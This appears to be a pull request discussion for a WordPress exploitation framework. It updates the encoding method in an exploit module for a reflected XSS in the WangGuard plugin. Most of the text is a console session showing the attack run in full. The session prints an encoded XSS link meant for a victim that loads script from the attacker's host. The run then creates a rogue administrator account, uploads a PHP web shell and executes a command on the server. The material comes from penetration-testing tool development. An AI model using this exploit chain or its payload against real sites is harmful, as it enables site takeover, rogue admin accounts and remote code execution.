update to use new method 'xss_url_and_ascii_encoded_include_script'

[phyushin]

Update to use xss_url_and_ascii_encoded_include_script over xss_ascii_encode_include_script

example:

wpxf > use exploit/wang_guard_reflected_xss_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::WangGuardReflectedXssShellUpload:0x1c11e28>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set host 192.168.0.48

  [+] Set host => 192.168.0.48

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set xss_host 192.168.0.36

  [+] Set xss_host => 192.168.0.36

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x1be9580>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.48/wp-admin/admin.php?page=wangguard_users_info&userIP=%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C51%2C54%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C122%2C114%2C103%2C107%2C75%2C120%2C112%2C106%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E%3C

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, lhisIQ:OurUpNZqjU
  [-] HTTP server stopped
  [-] Authenticating with WordPress using lhisIQ:OurUpNZqjU...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.48/wp-content/plugins/CtepZfbKHQ/wLcwBaezGR.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/wang_guard_reflected_xss_shell_upload] >

[rastating]

Merged, thanks for the contribution 🍻